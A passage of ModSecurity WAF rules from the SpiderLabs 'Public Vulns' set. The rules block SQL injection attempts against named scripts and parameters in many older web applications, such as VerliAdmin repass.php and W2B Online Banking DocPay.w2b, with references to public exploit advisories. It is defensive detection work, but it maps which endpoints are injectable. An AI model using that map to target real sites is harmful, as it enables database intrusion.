WEB_SPECIFIC_APPS Ublog Reload SQL Injection Attempt -- badword.asp UPDATE',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/SQL_INJECTION-%{matched_var_name}=%{matched_var}'" # (2007204) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS Ultimate Survey Pro SQL Injection Attempt -- index.asp cat UPDATE SecRule REQUEST_LINE "@contains /index.asp" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2007204,rev:4,msg:'SLR: ET WEB_SPECIFIC_APPS Ultimate Survey Pro SQL Injection Attempt -- index.asp cat UPDATE',tag:'web-application-attack',tag:'url,www.securityfocus.com/archive/1/archive/1/452554/100/0/threaded'" SecRule &TX:'/SQL_INJECTION.*ARGS:cat/' "@gt 0" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS Ultimate Survey Pro SQL Injection Attempt -- index.asp cat UPDATE',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/SQL_INJECTION-%{matched_var_name}=%{matched_var}'" # (2007210) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS Ultimate Survey Pro SQL Injection Attempt -- index.asp did UPDATE SecRule REQUEST_LINE "@contains /index.asp" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2007210,rev:4,msg:'SLR: ET WEB_SPECIFIC_APPS Ultimate Survey Pro SQL Injection Attempt -- index.asp did UPDATE',tag:'web-application-attack',tag:'url,www.securityfocus.com/archive/1/archive/1/452554/100/0/threaded'" SecRule &TX:'/SQL_INJECTION.*ARGS:did/' "@gt 0" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS Ultimate Survey Pro SQL Injection Attempt -- index.asp did UPDATE',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/SQL_INJECTION-%{matched_var_name}=%{matched_var}'" # (2005674) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS VP-ASP Shopping Cart SQL Injection Attempt -- shopgiftregsearch.asp LoginLastname UPDATE SecRule REQUEST_LINE "@contains /shopgiftregsearch.asp" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2005674,rev:5,msg:'SLR: ET WEB_SPECIFIC_APPS VP-ASP Shopping Cart SQL Injection Attempt -- shopgiftregsearch.asp LoginLastname UPDATE',tag:'web-application-attack',tag:'url,www.milw0rm.com/exploits/3115'" SecRule &TX:'/SQL_INJECTION.*ARGS:LoginLastname/' "@gt 0" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS VP-ASP Shopping Cart SQL Injection Attempt -- shopgiftregsearch.asp LoginLastname UPDATE',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/SQL_INJECTION-%{matched_var_name}=%{matched_var}'" # (2006608) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS Vt-Forum Lite SQL Injection Attempt -- vf_memberdetail.asp user UPDATE SecRule REQUEST_LINE "@contains /vf_memberdetail.asp" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2006608,rev:5,msg:'SLR: ET WEB_SPECIFIC_APPS Vt-Forum Lite SQL Injection Attempt -- vf_memberdetail.asp user UPDATE',tag:'web-application-attack',tag:'url,www.frsirt.com/english/advisories/2006/4850'" SecRule &TX:'/SQL_INJECTION.*ARGS:user/' "@gt 0" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS Vt-Forum Lite SQL Injection Attempt -- vf_memberdetail.asp user UPDATE',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/SQL_INJECTION-%{matched_var_name}=%{matched_var}'" # (2006284) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS VerliAdmin SQL Injection Attempt -- repass.php nick_mod UPDATE SecRule REQUEST_LINE "@contains /repass.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2006284,rev:5,msg:'SLR: ET WEB_SPECIFIC_APPS VerliAdmin SQL Injection Attempt -- repass.php nick_mod UPDATE',tag:'web-application-attack',tag:'url,www.frsirt.com/english/advisories/2006/5059'" SecRule &TX:'/SQL_INJECTION.*ARGS:nick_mod/' "@gt 0" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS VerliAdmin SQL Injection Attempt -- repass.php nick_mod UPDATE',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/SQL_INJECTION-%{matched_var_name}=%{matched_var}'" # (2006290) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS VerliAdmin SQL Injection Attempt -- repass.php nick UPDATE SecRule REQUEST_LINE "@contains /repass.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2006290,rev:5,msg:'SLR: ET WEB_SPECIFIC_APPS VerliAdmin SQL Injection Attempt -- repass.php nick UPDATE',tag:'web-application-attack',tag:'url,www.frsirt.com/english/advisories/2006/5059'" SecRule &TX:'/SQL_INJECTION.*ARGS:nick/' "@gt 0" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS VerliAdmin SQL Injection Attempt -- repass.php nick UPDATE',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/SQL_INJECTION-%{matched_var_name}=%{matched_var}'" # (2006296) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS VerliAdmin SQL Injection Attempt -- verify.php nick UPDATE SecRule REQUEST_LINE "@contains /verify.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2006296,rev:5,msg:'SLR: ET WEB_SPECIFIC_APPS VerliAdmin SQL Injection Attempt -- verify.php nick UPDATE',tag:'web-application-attack',tag:'url,www.frsirt.com/english/advisories/2006/5059'" SecRule &TX:'/SQL_INJECTION.*ARGS:nick/' "@gt 0" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS VerliAdmin SQL Injection Attempt -- verify.php nick UPDATE',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/SQL_INJECTION-%{matched_var_name}=%{matched_var}'" # (2006302) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS VerliAdmin SQL Injection Attempt -- verify.php nick_mod UPDATE SecRule REQUEST_LINE "@contains /verify.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2006302,rev:5,msg:'SLR: ET WEB_SPECIFIC_APPS VerliAdmin SQL Injection Attempt -- verify.php nick_mod UPDATE',tag:'web-application-attack',tag:'url,www.frsirt.com/english/advisories/2006/5059'" SecRule &TX:'/SQL_INJECTION.*ARGS:nick_mod/' "@gt 0" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS VerliAdmin SQL Injection Attempt -- verify.php nick_mod UPDATE',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/SQL_INJECTION-%{matched_var_name}=%{matched_var}'" # (2005498) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS Virtuemart SQL Injection Attempt -- virtuemart_parser.php Itemid UPDATE SecRule REQUEST_LINE "@contains /virtuemart_parser.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2005498,rev:5,msg:'SLR: ET WEB_SPECIFIC_APPS Virtuemart SQL Injection Attempt -- virtuemart_parser.php Itemid UPDATE',tag:'web-application-attack',tag:'url,www.securityfocus.com/bid/22123'" SecRule &TX:'/SQL_INJECTION.*ARGS:Itemid/' "@gt 0" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS Virtuemart SQL Injection Attempt -- virtuemart_parser.php Itemid UPDATE',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/SQL_INJECTION-%{matched_var_name}=%{matched_var}'" # (2005504) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS Virtuemart SQL Injection Attempt -- virtuemart_parser.php product_id UPDATE SecRule REQUEST_LINE "@contains /virtuemart_parser.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2005504,rev:5,msg:'SLR: ET WEB_SPECIFIC_APPS Virtuemart SQL Injection Attempt -- virtuemart_parser.php product_id UPDATE',tag:'web-application-attack',tag:'url,www.securityfocus.com/bid/22123'" SecRule &TX:'/SQL_INJECTION.*ARGS:product_id/' "@gt 0" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS Virtuemart SQL Injection Attempt -- virtuemart_parser.php product_id UPDATE',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/SQL_INJECTION-%{matched_var_name}=%{matched_var}'" # (2005510) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS Virtuemart SQL Injection Attempt -- virtuemart_parser.php category_id UPDATE SecRule REQUEST_LINE "@contains /virtuemart_parser.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2005510,rev:5,msg:'SLR: ET WEB_SPECIFIC_APPS Virtuemart SQL Injection Attempt -- virtuemart_parser.php category_id UPDATE',tag:'web-application-attack',tag:'url,www.securityfocus.com/bid/22123'" SecRule &TX:'/SQL_INJECTION.*ARGS:category_id/' "@gt 0" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS Virtuemart SQL Injection Attempt -- virtuemart_parser.php category_id UPDATE',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/SQL_INJECTION-%{matched_var_name}=%{matched_var}'" # (2003998) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS Vizayn Urun Tanitim Sitesi SQL Injection Attempt -- default.asp id UPDATE SecRule REQUEST_LINE "@contains /default.asp" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2003998,rev:6,msg:'SLR: ET WEB_SPECIFIC_APPS Vizayn Urun Tanitim Sitesi SQL Injection Attempt -- default.asp id UPDATE',tag:'web-application-attack',tag:'url,www.secunia.com/advisories/25348'" SecRule &TX:'/SQL_INJECTION.*ARGS:id/' "@gt 0" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS Vizayn Urun Tanitim Sitesi SQL Injection Attempt -- default.asp id UPDATE',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/SQL_INJECTION-%{matched_var_name}=%{matched_var}'" # (2005894) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS Vizayn Haber SQL Injection Attempt -- haberdetay.asp id UPDATE SecRule REQUEST_LINE "@contains /haberdetay.asp" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2005894,rev:5,msg:'SLR: ET WEB_SPECIFIC_APPS Vizayn Haber SQL Injection Attempt -- haberdetay.asp id UPDATE',tag:'web-application-attack',tag:'url,www.milw0rm.com/exploits/3061'" SecRule &TX:'/SQL_INJECTION.*ARGS:id/' "@gt 0" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS Vizayn Haber SQL Injection Attempt -- haberdetay.asp id UPDATE',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/SQL_INJECTION-%{matched_var_name}=%{matched_var}'" # (2007421) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS vSpin.net Classified System SQL Injection Attempt -- cat.asp cat UPDATE SecRule REQUEST_LINE "@contains /cat.asp" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2007421,rev:4,msg:'SLR: ET WEB_SPECIFIC_APPS vSpin.net Classified System SQL Injection Attempt -- cat.asp cat UPDATE',tag:'web-application-attack',tag:'url,www.securityfocus.com/bid/21190'" SecRule &TX:'/SQL_INJECTION.*ARGS:cat/' "@gt 0" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS vSpin.net Classified System SQL Injection Attempt -- cat.asp cat UPDATE',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/SQL_INJECTION-%{matched_var_name}=%{matched_var}'" # (2007427) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS vSpin.net Classified System SQL Injection Attempt -- search.asp keyword UPDATE SecRule REQUEST_LINE "@contains /search.asp" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2007427,rev:4,msg:'SLR: ET WEB_SPECIFIC_APPS vSpin.net Classified System SQL Injection Attempt -- search.asp keyword UPDATE',tag:'web-application-attack',tag:'url,www.securityfocus.com/bid/21190'" SecRule &TX:'/SQL_INJECTION.*ARGS:keyword/' "@gt 0" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS vSpin.net Classified System SQL Injection Attempt -- search.asp keyword UPDATE',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/SQL_INJECTION-%{matched_var_name}=%{matched_var}'" # (2007433) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS vSpin.net Classified System SQL Injection Attempt -- search.asp order UPDATE SecRule REQUEST_LINE "@contains /search.asp" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2007433,rev:4,msg:'SLR: ET WEB_SPECIFIC_APPS vSpin.net Classified System SQL Injection Attempt -- search.asp order UPDATE',tag:'web-application-attack',tag:'url,www.securityfocus.com/bid/21190'" SecRule &TX:'/SQL_INJECTION.*ARGS:order/' "@gt 0" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS vSpin.net Classified System SQL Injection Attempt -- search.asp order UPDATE',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/SQL_INJECTION-%{matched_var_name}=%{matched_var}'" # (2007439) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS vSpin.net Classified System SQL Injection Attempt -- search.asp sort UPDATE SecRule REQUEST_LINE "@contains /search.asp" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2007439,rev:4,msg:'SLR: ET WEB_SPECIFIC_APPS vSpin.net Classified System SQL Injection Attempt -- search.asp sort UPDATE',tag:'web-application-attack',tag:'url,www.securityfocus.com/bid/21190'" SecRule &TX:'/SQL_INJECTION.*ARGS:sort/' "@gt 0" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS vSpin.net Classified System SQL Injection Attempt -- search.asp sort UPDATE',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/SQL_INJECTION-%{matched_var_name}=%{matched_var}'" # (2007445) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS vSpin.net Classified System SQL Injection Attempt -- search.asp menuSelect UPDATE SecRule REQUEST_LINE "@contains /search.asp" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2007445,rev:4,msg:'SLR: ET WEB_SPECIFIC_APPS vSpin.net Classified System SQL Injection Attempt -- search.asp menuSelect UPDATE',tag:'web-application-attack',tag:'url,www.securityfocus.com/bid/21190'" SecRule &TX:'/SQL_INJECTION.*ARGS:menuSelect/' "@gt 0" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS vSpin.net Classified System SQL Injection Attempt -- search.asp menuSelect UPDATE',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/SQL_INJECTION-%{matched_var_name}=%{matched_var}'" # (2007451) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS vSpin.net Classified System SQL Injection Attempt -- search.asp state UPDATE SecRule REQUEST_LINE "@contains /search.asp" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2007451,rev:4,msg:'SLR: ET WEB_SPECIFIC_APPS vSpin.net Classified System SQL Injection Attempt -- search.asp state UPDATE',tag:'web-application-attack',tag:'url,www.securityfocus.com/bid/21190'" SecRule &TX:'/SQL_INJECTION.*ARGS:state/' "@gt 0" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS vSpin.net Classified System SQL Injection Attempt -- search.asp state UPDATE',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/SQL_INJECTION-%{matched_var_name}=%{matched_var}'" # (2004133) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS w-Agora SQL Injection Attempt -- search.php search_forum UPDATE SecRule REQUEST_LINE "@contains /search.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2004133,rev:5,msg:'SLR: ET WEB_SPECIFIC_APPS w-Agora SQL Injection Attempt -- search.php search_forum UPDATE',tag:'web-application-attack',tag:'url,www.securityfocus.com/bid/23057'" SecRule &TX:'/SQL_INJECTION.*ARGS:search_forum/' "@gt 0" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS w-Agora SQL Injection Attempt -- search.php search_forum UPDATE',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/SQL_INJECTION-%{matched_var_name}=%{matched_var}'" # (2004139) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS w-Agora SQL Injection Attempt -- search.php search_user UPDATE SecRule REQUEST_LINE "@contains /search.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2004139,rev:5,msg:'SLR: ET WEB_SPECIFIC_APPS w-Agora SQL Injection Attempt -- search.php search_user UPDATE',tag:'web-application-attack',tag:'url,www.securityfocus.com/bid/23057'" SecRule &TX:'/SQL_INJECTION.*ARGS:search_user/' "@gt 0" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS w-Agora SQL Injection Attempt -- search.php search_user UPDATE',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/SQL_INJECTION-%{matched_var_name}=%{matched_var}'" # (2004652) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS W1L3D4 WEBmarket SQL Injection Attempt -- urunbak.asp id UPDATE SecRule REQUEST_LINE "@contains /urunbak.asp" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2004652,rev:5,msg:'SLR: ET WEB_SPECIFIC_APPS W1L3D4 WEBmarket SQL Injection Attempt -- urunbak.asp id UPDATE',tag:'web-application-attack',tag:'url,www.securityfocus.com/bid/24364'" SecRule &TX:'/SQL_INJECTION.*ARGS:id/' "@gt 0" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS W1L3D4 WEBmarket SQL Injection Attempt -- urunbak.asp id UPDATE',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/SQL_INJECTION-%{matched_var_name}=%{matched_var}'" # (2005309) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS W2B Online Banking SQL Injection Attempt -- mailer.w2b draft UPDATE SecRule REQUEST_LINE "@contains /mailer.w2b" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2005309,rev:5,msg:'SLR: ET WEB_SPECIFIC_APPS W2B Online Banking SQL Injection Attempt -- mailer.w2b draft UPDATE',tag:'web-application-attack',tag:'cve,CVE-2007-3175'" SecRule &TX:'/SQL_INJECTION.*ARGS:draft/' "@gt 0" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS W2B Online Banking SQL Injection Attempt -- mailer.w2b draft UPDATE',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/SQL_INJECTION-%{matched_var_name}=%{matched_var}'" # (2005191) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS W2B Online Banking SQL Injection Attempt -- DocPay.w2b listDocPay UPDATE SecRule REQUEST_LINE "@contains /DocPay.w2b" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2005191,rev:5,msg:'SLR: ET WEB_SPECIFIC_APPS W2B Online Banking SQL Injection Attempt -- DocPay.w2b listDocPay UPDATE',tag:'web-application-attack',tag:'cve,CVE-2007-3175'" SecRule &TX:'/SQL_INJECTION.*ARGS:listDocPay/' "@gt 0" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS W2B Online Banking SQL Injection Attempt -- DocPay.w2b listDocPay UPDATE',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/SQL_INJECTION-%{matched_var_name}=%{matched_var}'" # (2004317) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS WBBlog SQL Injection Attempt -- index.php e_id UPDATE SecRule REQUEST_LINE "@contains /index.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2004317,rev:5,msg:'SLR: ET WEB_SPECIFIC_APPS WBBlog SQL Injection Attempt -- index.php e_id UPDATE',tag:'web-application-attack',tag:'url,www.milw0rm.com/exploits/3490'" SecRule &TX:'/SQL_INJECTION.*ARGS:e_id/' "@gt 0" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS WBBlog SQL Injection Attempt -- index.php e_id UPDATE',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/SQL_INJECTION-%{matched_var_name}=%{matched_var}'" # (2005954) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS Website Designs For Less Click N Print Coupons SQL Injection Attempt -- coupon_detail.asp key UPDATE SecRule REQUEST_LINE "@contains /coupon_detail.asp" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2005954,rev:5,msg:'SLR: ET WEB_SPECIFIC_APPS Website Designs For Less Click N Print Coupons SQL Injection Attempt -- coupon_detail.asp key UPDATE',tag:'web-application-attack',tag:'url,www.securityfocus.com/bid/21824'" SecRule &TX:'/SQL_INJECTION.*ARGS:key/' "@gt 0" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS Website Designs For Less Click N Print Coupons SQL Injection Attempt -- coupon_detail.asp key UPDATE',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/SQL_INJECTION-%{matched_var_name}=%{matched_var}'" # (2003769) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS WF-Links (wflinks) SQL Injection Attempt -- viewcat.php cid UPDATE SecRule REQUEST_LINE "@contains /viewcat.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2003769,rev:5,msg:'SLR: ET WEB_SPECIFIC_APPS WF-Links (wflinks) SQL Injection Attempt -- viewcat.php cid UPDATE',tag:'web-application-attack',tag:'url,www.milw0rm.com/exploits/3670'" SecRule &TX:'/SQL_INJECTION.*ARGS:cid/' "@gt 0" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS WF-Links (wflinks) SQL Injection Attempt -- viewcat.php cid UPDATE',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/SQL_INJECTION-%{matched_var_name}=%{matched_var}'" # (2004258) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS WSN Guest SQL Injection Attempt -- comments.php id UPDATE SecRule REQUEST_LINE "@contains /comments.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2004258,rev:5,msg:'SLR: ET WEB_SPECIFIC_APPS WSN Guest SQL Injection Attempt -- comments.php id UPDATE',tag:'web-application-attack',tag:'url,www.milw0rm.com/exploits/3477'" SecRule &TX:'/SQL_INJECTION.*ARGS:id/' "@gt 0" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS WSN Guest SQL Injection Attempt -- comments.php id UPDATE',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/SQL_INJECTION-%{matched_var_name}=%{matched_var}'" # (2006460) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS WSPortal SQL Injection Attempt -- content.php page UPDATE SecRule REQUEST_LINE "@contains /content.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2006460,rev:5,msg:'SLR: ET WEB_SPECIFIC_APPS WSPortal SQL Injection Attempt -- content.php page UPDATE',tag:'web-application-attack',tag:'url,www.osvdb.org/34164'" SecRule &TX:'/SQL_INJECTION.*ARGS:page/' "@gt 0" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS WSPortal SQL Injection Attempt -- content.php page UPDATE',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/SQL_INJECTION-%{matched_var_name}=%{matched_var}'" # (2005960) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS While You Were Out (WYWO) InOut Board SQL Injection Attempt -- phonemessage.asp num UPDATE SecRule REQUEST_LINE "@contains /phonemessage.asp" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2005960,rev:5,msg:'SLR: ET WEB_SPECIFIC_APPS While You Were Out (WYWO) InOut Board SQL Injection Attempt -- phonemessage.asp num UPDATE',tag:'web-application-attack',tag:'url,www.milw0rm.com/exploits/3032'" SecRule &TX:'/SQL_INJECTION.*ARGS:num/' "@gt 0" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS While You Were Out (WYWO) InOut Board SQL Injection Attempt -- phonemessage.asp num UPDATE',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/SQL_INJECTION-%{matched_var_name}=%{matched_var}'" # (2005966) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS While You Were Out (WYWO) InOut Board SQL Injection Attempt -- faqDsp.asp catcode UPDATE SecRule REQUEST_LINE "@contains /faqDsp.asp" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2005966,rev:5,msg:'SLR: ET WEB_SPECIFIC_APPS While You Were Out (WYWO) InOut Board SQL Injection Attempt -- faqDsp.asp catcode UPDATE',tag:'web-application-attack',tag:'url,www.milw0rm.com/exploits/3032'" SecRule &TX:'/SQL_INJECTION.*ARGS:catcode/' "@gt 0" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS While You Were Out (WYWO) InOut Board SQL Injection Attempt -- faqDsp.asp catcode 